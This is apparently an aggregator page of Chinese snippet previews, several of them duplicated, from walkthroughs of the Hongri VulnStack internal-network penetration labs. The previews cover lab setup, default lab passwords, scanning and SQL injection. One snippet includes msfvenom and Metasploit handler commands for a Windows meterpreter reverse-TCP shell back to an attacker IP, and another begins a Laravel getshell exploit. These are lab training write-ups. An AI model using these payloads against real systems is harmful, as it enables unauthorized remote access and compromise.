草庐IT

红日(vulnstack)2 内网渗透ATT&CK实战

环境配置链接:百度网盘请输入提取码提取码:wmsi攻击机:kali2022.03web192.168.111.8010.10.10.80自定义网卡8,自定义网卡18PC192.168.111.20110.10.10.201自定义网卡8,自定义网卡18DC192.168.52.141自定义网卡18所有靶机密码为:1qaz@WSX登录webde1ay修改密码为Admin@123,再切换用户mssql登录进行后,手动开启weblogic服务C:\Oracle\Middleware\user_projects\domains\base_domain\binweb渗透1.扫描靶机开放端口和相应服务情况n

红日靶场(二)ATT&CK红队评估第一次打+复盘总结

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/环境配置:web靶机需要恢复到快照3,然后登陆时切换用户为:WEB\de1ay密码:1qaz@WSX,这样后续还有提权步骤,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行startweblogic服务然后我将虚拟机nat网段设置成了和web靶机一样的192.168.111.0/24,然后让web靶机改为自动获取ip,就可以出网了配置信息:DCIP:10.10.10.10OS:Windows2012(64)应用:A

红日靶场(二)ATT&CK红队评估第一次打+复盘总结

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/环境配置:web靶机需要恢复到快照3,然后登陆时切换用户为:WEB\de1ay密码:1qaz@WSX,这样后续还有提权步骤,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行startweblogic服务然后我将虚拟机nat网段设置成了和web靶机一样的192.168.111.0/24,然后让web靶机改为自动获取ip,就可以出网了配置信息:DCIP:10.10.10.10OS:Windows2012(64)应用:A

红日安全内网渗透靶场-VulnStack-1

0x00.网络拓扑0x01.环境搭建一共有三台虚拟机Win7(对外),Win2003和Win2008(对内)Win2003:添加一张网卡(VMnet1)Win2008:添加一张网卡(VMnet1)Win7:添加两张网卡(VMnet1,VMnet8)网络环境配置完成之后首先打开Win2008,使用默认账号GOD\liukaifeng01,密码hongrisec@2019进行登录,登录后提示密码已过期,修改新密码之后重启即可,然后切换到GOD\Administrator用户重复前面的操作,重启Win2008后打开另外两台机器,在Win7上打开Phpstudy服务Win2008:Win7:开启Php

红日安全内网渗透靶场-VulnStack-1

0x00.网络拓扑0x01.环境搭建一共有三台虚拟机Win7(对外),Win2003和Win2008(对内)Win2003:添加一张网卡(VMnet1)Win2008:添加一张网卡(VMnet1)Win7:添加两张网卡(VMnet1,VMnet8)网络环境配置完成之后首先打开Win2008,使用默认账号GOD\liukaifeng01,密码hongrisec@2019进行登录,登录后提示密码已过期,修改新密码之后重启即可,然后切换到GOD\Administrator用户重复前面的操作,重启Win2008后打开另外两台机器,在Win7上打开Phpstudy服务Win2008:Win7:开启Php

红日靶场(内网渗透)——1

1.靶机信息。win7x64:ip:192.168.248.1292008:ip:192.168.138win2k3:192.168.52.141攻击机信息:kali:集成各种攻击工具 ip:192.168.248.128win10:主要进行数据整理。2.信息搜集。1)使用kali扫描靶机netdiscover-r靶机IP网段   发现win7外网网址为:192.168.248.129对192.168.248.129进行端口扫描。   发现开放端口80及3306.确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。2)网站信息搜集对网目录进行扫描,发现phpmyadmin页面:

红日靶场(内网渗透)——1

1.靶机信息。win7x64:ip:192.168.248.1292008:ip:192.168.138win2k3:192.168.52.141攻击机信息:kali:集成各种攻击工具 ip:192.168.248.128win10:主要进行数据整理。2.信息搜集。1)使用kali扫描靶机netdiscover-r靶机IP网段   发现win7外网网址为:192.168.248.129对192.168.248.129进行端口扫描。   发现开放端口80及3306.确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。2)网站信息搜集对网目录进行扫描,发现phpmyadmin页面:

红日靶场(内网渗透)——2

1.后渗透。之前我们已经将小马上传,在这里用webshell进行进一步渗透。1)基于msf利用msf生成exe,并上传。msfvenom-pwindows/meterpreter_reverse_tcpLHOST=192.168.248.128LPORT=1234-fexe-o1.exe   useexploit/multi/handlersetpayloadwindows/x64/meterpreter_reverse_tcpsetlhost192.168.248.128setlport1234exploit   之后直接进行提权。2)进行提权。   这里用户为admin,所以可以直接提到s

红日靶场(内网渗透)——2

1.后渗透。之前我们已经将小马上传,在这里用webshell进行进一步渗透。1)基于msf利用msf生成exe,并上传。msfvenom-pwindows/meterpreter_reverse_tcpLHOST=192.168.248.128LPORT=1234-fexe-o1.exe   useexploit/multi/handlersetpayloadwindows/x64/meterpreter_reverse_tcpsetlhost192.168.248.128setlport1234exploit   之后直接进行提权。2)进行提权。   这里用户为admin,所以可以直接提到s

红日靶场七——WP

靶场拓扑一、外网打点1.1信息收集对外网IP172.16.10.234进行信息收集,使用工具Kmap探测端口开放情况,命令如下:./Kmap-i172.16.10.234-p1-65535-okk.txt-n2081端口开放了Laravel服务,6379端口开放了Redis服务。版本8.29.08.4.3,存在远程代码执行漏洞。使用Fscan进行漏洞扫描,发现存在Redis未授权漏洞:二、漏洞利用根据前边的信息收集,发现有两个漏洞可以进行利用,一个是Laravel一个是Redis未授权访问。2.1Laravel-GetshellEXP如下:#!/usr/bin/python3importreq